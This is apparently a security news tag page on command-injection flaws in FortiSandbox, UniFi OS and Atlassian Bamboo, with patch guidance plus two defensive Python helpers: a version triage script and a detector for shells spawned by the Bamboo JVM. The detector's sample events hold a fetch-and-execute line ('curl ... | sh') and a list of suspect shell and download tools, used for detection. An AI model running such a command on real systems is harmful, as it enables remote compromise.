Last updated: July 5, 2026 at 9:01 AM UTC
Tag: command-injection (3 articles)

Critical FortiSandbox flaw lets unauthenticated attackers run commands

Fortinet has patched a critical flaw in FortiSandbox, the appliance that detonates suspicious files and feeds malware verdicts to the rest of a Fortinet security deployment. The bug (CVE-2026-25089, CVSS 9.8) is an OS command injection in the web interface that lets a remote, unauthenticated attacker run arbitrary commands by sending crafted HTTP requests. Compromising a sandbox is especially dangerous because an attacker can both pivot deeper into the network and blind the very system meant to catch malware. Fixed versions are FortiSandbox 5.0.6 and 4.4.9, with matching updates for the Cloud and PaaS editions.

Check
Inventory FortiSandbox appliances (including Cloud and PaaS tenants) with their firmware version, confirm whether the web interface is reachable from untrusted networks, and review web-interface access logs for anomalous requests and the appliance's admin and process logs for unexpected command execution.
Affected
FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web interfaces before the fixed releases (5.0.6 and 4.4.9 on the appliance, with matching Cloud and PaaS updates). CVE-2026-25089 is reachable by a remote, unauthenticated attacker over HTTP.
Fix
Upgrade FortiSandbox to 5.0.6 or 4.4.9 (and the matching Cloud and PaaS releases) now, and restrict management-interface access to trusted networks until patched.

Ubiquiti patches three max-severity UniFi OS flaws (CVE-2026-34908/34909/34910) plus two more - ~100K endpoints exposed online

Ubiquiti has shipped patches for five UniFi OS vulnerabilities, three of which carry the maximum CVSS score and are exploitable by remote unauthenticated attackers. CVE-2026-34908 is an improper access control flaw that lets attackers make unauthorized changes; CVE-2026-34909 is a path traversal that reaches an underlying system account; CVE-2026-34910 is an unauthenticated command injection. Two additional flaws (CVE-2026-33000, a critical command injection, and CVE-2026-34911, a high-severity information disclosure) were patched in the same release. All five came through Ubiquiti's HackerOne program. Censys is tracking close to 100,000 internet-exposed UniFi OS endpoints, around 50,000 of them in the US. Ubiquiti devices were previously hijacked into the GRU-operated Moobot botnet.

Check
Inventory UniFi OS consoles (Dream Machine, Cloud Key, UNVR, UCG) and their UniFi OS version. Check your public IP ranges, with Censys or an external port scan, for exposed UniFi web interfaces and management ports.
Affected
All UniFi OS Consoles (Dream Machine, Cloud Key, UNVR, UCG) before the May 22 patches. Roughly 100,000 internet-exposed endpoints worldwide, with about 50,000 in the United States.
Fix
Apply Ubiquiti's UniFi OS updates immediately on every console. Move management interfaces off the public internet. Restrict admin access to a management VLAN reachable only over VPN.

Atlassian Bamboo Data Center hit with critical OS command injection (CVE-2026-21571, CVSS 9.4) - patch your CI/CD before someone uses it as a supply-chain pivot

Atlassian's April 21 security bulletin disclosed CVE-2026-21571, a critical OS command injection in Bamboo Data Center and Server with CVSS 9.4. An authenticated attacker can execute arbitrary commands on the underlying server, leading to full system compromise and lateral movement. Affected branches: 9.6, 10.0, 10.1, 10.2, 11.0, 11.1, 12.0, 12.1. The same bulletin patches CVE-2026-33871 (CVSS 8.7) - a Netty HTTP/2 DoS that can knock CI/CD pipelines offline. Bamboo sits at the heart of build pipelines, giving attackers a clean path to tamper with artifacts and harvest pipeline secrets.

Check
Inventory every Bamboo Data Center and Server instance you run and record its version: anything on the 9.6 through 12.1 branches that is not yet on 9.6.25, 10.2.18 or 12.1.6 is in scope. While you are there, review Bamboo's server-side audit and build logs for shell commands that no build plan should have issued.
Affected
Atlassian Bamboo Data Center and Server 9.6.0 through 12.1.3 inclusive are affected by CVE-2026-21571 (CVSS 9.4, authenticated OS command injection). The same releases are also exposed to CVE-2026-33871 (CVSS 8.7, DoS via Netty HTTP/2). The authenticated requirement is small comfort: any leaked or shared technician credential is enough.
Fix
Upgrade to Bamboo 12.1.6 LTS, 10.2.18 LTS, or 9.6.25. Audit Bamboo accounts and disable shared logins; require MFA on every Bamboo auth path. Alert on shell interpreters or curl/wget spawning from the Bamboo Java process. Restrict the admin UI to internal networks. Rotate every credential stored in build configurations - they could have been read during the vulnerable window.
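The version checks in the FortiSandbox and Bamboo entries above share one trap: comparing version strings lexically, and forgetting that several of the affected Bamboo branches have no in-branch fix. The triage helper below is an added example, not code from this page, Fortinet or Atlassian. It encodes only the fixed releases the page states (FortiSandbox 5.0.6 and 4.4.9; Bamboo 9.6.25, 10.2.18 and 12.1.6), treats the Bamboo branches the page lists as affected without a fixed release as needing a move to the next fixed branch, and reports any other branch as not covered here. The inventory rows are constructed sample data, not real hosts.

```python
"""Per-branch fixed-version triage for the FortiSandbox and Bamboo advisories.

Added example, not from the page, Fortinet or Atlassian. Fixed releases are
the ones the page states; INVENTORY is constructed sample data.
"""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

Version = Tuple[int, ...]


def parse_version(s: str) -> Version:
    """'12.1.3' -> (12, 1, 3). Integer tuples compare correctly; as strings,
    '5.0.10' < '5.0.6' and a patched box would be reported as vulnerable."""
    return tuple(int(p) for p in s.strip().split("."))


# Fixed release per branch (branch = first two components), as stated on the page.
FIXED: Dict[str, Dict[Version, Version]] = {
    "FortiSandbox": {(5, 0): (5, 0, 6), (4, 4): (4, 4, 9)},
    "Bamboo": {(9, 6): (9, 6, 25), (10, 2): (10, 2, 18), (12, 1): (12, 1, 6)},
}

# Branches the page lists as affected that get no in-branch fix: these need a
# move to a fixed branch, not a point upgrade.
AFFECTED_NO_FIX: Dict[str, Set[Version]] = {
    "FortiSandbox": set(),
    "Bamboo": {(10, 0), (10, 1), (11, 0), (11, 1), (12, 0)},
}


@dataclass
class Verdict:
    host: str
    product: str
    version: str
    status: str  # "patched", "vulnerable" or "unknown-branch"
    action: str


def _fmt(v: Version) -> str:
    return ".".join(str(p) for p in v)


def triage(host: str, product: str, version: str) -> Verdict:
    v = parse_version(version)
    branch = v[:2]
    fixed = FIXED[product]
    if branch in fixed:
        if v >= fixed[branch]:
            return Verdict(host, product, version, "patched", "none")
        return Verdict(host, product, version, "vulnerable",
                       f"upgrade to {_fmt(fixed[branch])}")
    if branch in AFFECTED_NO_FIX[product]:
        # No fixed release in this branch: nearest fixed branch above it.
        higher = sorted(b for b in fixed if b > branch)
        target = _fmt(fixed[higher[0]]) if higher else _fmt(fixed[max(fixed)])
        return Verdict(host, product, version, "vulnerable",
                       f"no fix in branch {_fmt(branch)}; upgrade to {target}")
    return Verdict(host, product, version, "unknown-branch",
                   "branch not covered by this page; check the vendor advisory")


# Constructed sample inventory rows (not real hosts).
INVENTORY = [
    ("sandbox-01", "FortiSandbox", "5.0.4"),
    ("sandbox-02", "FortiSandbox", "5.0.10"),
    ("sandbox-03", "FortiSandbox", "4.4.9"),
    ("ci-build-01", "Bamboo", "12.1.3"),
    ("ci-build-02", "Bamboo", "11.0.2"),
    ("ci-build-03", "Bamboo", "9.6.25"),
    ("ci-build-04", "Bamboo", "8.2.9"),
]


def triage_inventory(rows=INVENTORY) -> List[Verdict]:
    return [triage(h, p, v) for h, p, v in rows]


if __name__ == "__main__":
    for r in triage_inventory():
        print(f"{r.host:12} {r.product:13} {r.version:8} {r.status:15} {r.action}")
```

Feed it your real inventory export in place of INVENTORY. A host that comes back as unknown-branch is not cleared; it simply falls outside what this page states and needs the vendor advisory.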
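The Bamboo Fix section above says to alert on shell interpreters or curl/wget spawning from the Bamboo Java process. The detector below is an added example, not Atlassian's code and not a vendor detection rule. It reads process-creation events in a constructed, generic JSON schema (pid, ppid, exe, cmdline), identifies the server JVM by a `java` binary with `bamboo` in its command line (an assumption about the deployment; adjust to how your JVM is launched), and flags suspect binaries anywhere in that JVM's descendant tree, so a `java -> sh -> curl` chain is caught at every hop rather than only at the direct child. The sample events are constructed.

```python
"""Flag shells and download tools spawned under the Bamboo server JVM.

Added example, not Atlassian's code. Events use a constructed, generic
process-creation schema (pid/ppid/exe/cmdline), not a specific EDR or
auditd format; map your own telemetry onto these fields.
"""
import json
import os
from typing import Dict, List, Optional

# Shell interpreters and download tools the Fix section tells us to alert on.
SUSPECT = {"sh", "bash", "dash", "zsh", "ksh", "curl", "wget"}
MAX_DEPTH = 6  # how many parent hops to walk looking for the Bamboo JVM

# Constructed sample telemetry: the server JVM, a benign root cron shell with
# no JVM ancestor, a curl-pipe-shell chain under the JVM, and a normal git child.
SAMPLE_EVENTS = """\
{"ts":"2026-04-22T10:00:00Z","host":"ci-build-01","pid":1200,"ppid":1,"user":"bamboo","exe":"/usr/lib/jvm/java-17/bin/java","cmdline":"java -Dcatalina.base=/opt/atlassian/bamboo -jar bamboo.jar"}
{"ts":"2026-04-22T10:00:05Z","host":"ci-build-01","pid":1301,"ppid":1,"user":"root","exe":"/usr/bin/bash","cmdline":"/bin/bash /etc/cron.daily/logrotate"}
{"ts":"2026-04-22T10:01:10Z","host":"ci-build-01","pid":1410,"ppid":1200,"user":"bamboo","exe":"/usr/bin/sh","cmdline":"sh -c curl -s http://203.0.113.7/x | sh"}
{"ts":"2026-04-22T10:01:10Z","host":"ci-build-01","pid":1411,"ppid":1410,"user":"bamboo","exe":"/usr/bin/curl","cmdline":"curl -s http://203.0.113.7/x"}
{"ts":"2026-04-22T10:01:11Z","host":"ci-build-01","pid":1412,"ppid":1410,"user":"bamboo","exe":"/usr/bin/sh","cmdline":"sh"}
{"ts":"2026-04-22T10:02:00Z","host":"ci-build-01","pid":1500,"ppid":1200,"user":"bamboo","exe":"/usr/bin/git","cmdline":"git fetch --all"}
"""


def is_bamboo_jvm(ev: dict) -> bool:
    # Assumption: the server JVM is a java binary with "bamboo" in its command line.
    return os.path.basename(ev["exe"]) == "java" and "bamboo" in ev["cmdline"].lower()


def load_events(text: str) -> Dict[int, dict]:
    """Index events by pid. Pid reuse inside the window is not handled here;
    key on a process GUID or start time when your telemetry provides one."""
    return {ev["pid"]: ev for ev in (json.loads(line) for line in text.splitlines() if line.strip())}


def bamboo_ancestor(ev: dict, by_pid: Dict[int, dict], max_depth: int = MAX_DEPTH) -> Optional[dict]:
    """Walk up the parent chain and return the Bamboo JVM event if one is found."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return None
        if is_bamboo_jvm(parent):
            return parent
        cur = parent
    return None


def detect(text: str) -> List[dict]:
    """Return one alert per suspect process that descends from the Bamboo JVM."""
    by_pid = load_events(text)
    alerts = []
    for ev in by_pid.values():
        name = os.path.basename(ev["exe"])
        if name not in SUSPECT:
            continue
        jvm = bamboo_ancestor(ev, by_pid)
        if jvm is None:
            continue
        alerts.append({"host": ev["host"], "pid": ev["pid"], "exe": name,
                       "cmdline": ev["cmdline"], "jvm_pid": jvm["pid"], "user": ev["user"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"ALERT {a['host']} pid={a['pid']} {a['exe']} under jvm {a['jvm_pid']}: {a['cmdline']}")
```

Expect noise if local agents execute build tasks inside the server JVM, since script tasks legitimately spawn shells there; run builds on remote agents, or scope the rule to a server that hosts no local agents, before paging on it. The benign root `bash` from cron in the sample is ignored because its parent chain never reaches the JVM, which is the point of walking ancestry rather than matching on binary name alone.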